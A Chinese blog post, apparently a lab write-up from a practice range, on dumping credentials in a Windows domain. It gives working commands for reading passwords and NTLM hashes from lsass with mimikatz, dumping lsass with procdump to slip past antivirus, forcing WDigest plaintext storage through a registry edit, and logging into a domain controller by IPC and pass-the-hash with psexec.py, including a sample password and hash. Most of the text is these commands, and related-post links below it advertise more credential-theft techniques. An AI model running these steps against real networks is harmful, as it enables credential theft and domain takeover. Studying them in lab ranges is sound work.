域渗透高权限读取本地密码

最新推荐文章于 2024-05-15 00:25:10 发布
最新推荐文章于 2024-05-15 00:25:10 发布
阅读量372 收藏
点赞数
分类专栏: 内网域环境 文章标签: 安全 web安全 windows 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122695621
版权

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

高权限读取本地密码

原理:

当域管理员在域成员机器上登录进行工作的时候,会将明文密码保存在本地进行的lsass.exe,可以通过mimikatz来读取到本地的明文密码。

建立IPC,获取域控权限:

假设域控已经登陆域成员机器:

mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit" >log.txt #使用mimikatz导出密码hash

在这里插入图片描述
当我们获取NTLM的hash,可以放到cmd5网站上进行解密:
在这里插入图片描述
建立IPC连接:

net use \\10.10.10.142\IPC$ /u:administrator QWEasd123

在这里插入图片描述
如果我们hash无法解密,则可以在使用脚本利用hash进行登陆,从而控制域控:

python3 psexec.py -hashes 00000000:42e2656ec24331269f82160ff5962387 ./Administrator@10.10.10.142

在这里插入图片描述
这里同样可以使用wimexec脚本:
在这里插入图片描述

使用procdump工具配合mimikatz获取明文:

当域管理上面存在杀软,我们上传mimikatz是会被杀掉,所以就可以使用procdump这款工具将lsass.exe里面的信息导出来,然后放到本地去进行分析,最终等到明文密码:
因为这款工具是微软研发的工具,所以一般不会被查杀:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp 
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

在这里插入图片描述
在这里插入图片描述

使用修改注册表方法配合mimikatz,获取明文:

修改注册表:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在这里插入图片描述
修改成功后,利用powershell脚本进行锁屏,当域控再次登陆域成员主机时,就可以使用mimikatz抓取明文密码:
这里大致的效果就和上面一样,所以就不过多操作:
在这里插入图片描述

全局变量Global
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透用户枚举与口令爆破
越努力 越自由
03-24 4314
Kerberos本身是一种基于身份认证的协议,在 Kerberos 协议认证的 第一阶段AS-REQ ,当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击。
内网渗透渗透
m0_57307920的博客
11-05 1100
当母公司的账户想要登录到子公司的中时,子公司的由于信任母公司的,所以子公司的会听从母公司的控制器的返回的access key。在一个中,可能存在多个控,这些控不分主控制器与备份控制器,每个控制器充当的是一样的角色,比如你有三个控制器,你可以在任何一个控制器上对用户的权限进行修改,你的修改将被复制到其他两个控制器中,这样,如果一个控制器发生了故障,只要其他的控还能正常工作,整个还是可以正常运行。如,对应的服务类型叫什么,机器名是什么,服务端口号是多少等等。
获取本机开机密码
03-15
可以获取开机密码,以后就不用愁开不了机了!!!
渗透TIPS:获取LAPS管理员密码
weixin_34037173的博客
08-01 565
如果你之前有对启用LAPS机制的主机进行渗透测试,那么你应该能体会到该机制的随机化本地管理员密码是有多么令人痛苦。 LAPS将其信息存储在活动目录: 存储密码过期时间:ms-Mcs-AdmPwdExpirationTime: 131461867015760024 以明文显示的存储密码:ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS...
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5766
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
内网渗透基石篇--权限提升(上)
qq_44005305的博客
07-31 289
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。通过网络共享可以访问到GPP的组策略的文件:[外链图片转存中…(img-WNkpjcL6-1690719347064)]打开可以看到存储的cpasword密码:[外链图片转存中…(img-xMcpcTd4-1690719347066)]六、 针对组策略首选项提取的防御措施1.设置共享文件夹SYSVOL的访问权限
内网渗透-----权限分析及防御
qq_43590351的博客
10-20 3093
内网权限提升及防御
渗透完全技巧.pdf
10-03
通过提权技术,攻击者可以获取本地管理员权限,然后通过绕过LSA(Local Security Authority)防护策略来读取密码Token,进而窃取本地存储的所有密码,如卷影拷贝,用于获取控的所有哈希值。DPAPI(Data Protection...
渗透.pdf
08-23
**渗透**是指通过一系列技术手段,在已获得一定访问权限的基础上,进一步扩大攻击范围,最终实现对整个环境的控制。渗透主要针对企业级网络环境,这些环境中通常部署了控(Domain Controller)系统来管理...
关于渗透学习1
08-24
在网络安全渗透是指攻击者通过各种技术手段入侵网络中的控制器,获取网络系统的控制权限。这种攻击通常发生在企业的内部网络环境中,一旦成功,攻击者能够对整个网络进行任意操作。本知识点将介绍一些基础...
获取本机所有明文密码
08-15
工具可以轻松获取,系统密码,包括浏览器存储的密码,以及各种邮箱,等系统所有密码
本地计算机密码获取
08-02
从计算机的随机内存中获取用户密码并经过转换输出出来,内附参数。
mimikatz_trunk
07-10
mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
如何破解控服务器管理员密码
02-23
文档介绍,如果忘记密码,如何进行破解,怎么样操作
渗透——获取用户明文密码
Ping_Pig的博客
04-23 3797
目录 讲在前面: 一、CredSSP获取明文密码 二、Dcsync获取明文密码 讲在前面: 本文是笔者在学习"三好学生"前辈的文章进而总结的一篇文章,内容主要是在内网渗透中获得明文密码的两种方式。,在笔者看来,两种办法都有一定的限制性和局限性,当然还有其他的办法,这需要笔者进一步的继续深入学习从而总结。 一、CredSSP获取明文密码 CredSSP的研究文章的文章通过CredSSP导出用户的明文口令。这篇文章已经分析的非常清楚如何使用,以及使用的场景,当然优缺点也给大家进行了展示,这里不做赘
本机获取wifi密码
z13269897509的博客
07-19 67
cmd先看连接过的wifi netsh wlan show profiles 然后 netsh wlan show profiles name="which" key =clear 就可以看到了
密码抓取技术
最新发布
Y22Lee的博客
05-15 1333
Windows XP SP2和Windows Server 2003开始,微软就向Windows操作系统中引入了一项名叫卷影拷贝的服务(Volume Shadow Copy Service-VSS)。这种服务允许Windows系统以自动或手动的方式对文件或磁盘卷宗的当前状态进行备份(或快照),需要注意的是,在这个过程中,即使。
配置windows2012控环境,并抓取用户的哈希密码和配置用户windows自动更新
zwish的信安之路
12-06 565
配置windows2012控环境,并抓取用户的哈希密码 实际步骤在下面的博客写的很清楚了,我就不再重复了 https://www.jianshu.com/p/2708f3dfb7cf 但有个问题可能会碰到: 当使用server2012和win7搭建控环境时,每次将server2012升级为控制器之后,就ping不通win7(作为用户存在)了,报错“一般故障”,查了很多资料都没解决(防火墙、...
Mimikatz深度指南:提取Windows密码与Hash
由于Mimikatz能直接从lsass(本地安全授权子系统服务)进程中读取内存,因此在未安装特定补丁或低版本的Windows系统中,可以读取到明文密码。不过,需要注意的是,安装了KB2871997补丁或使用Windows Server 2012及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值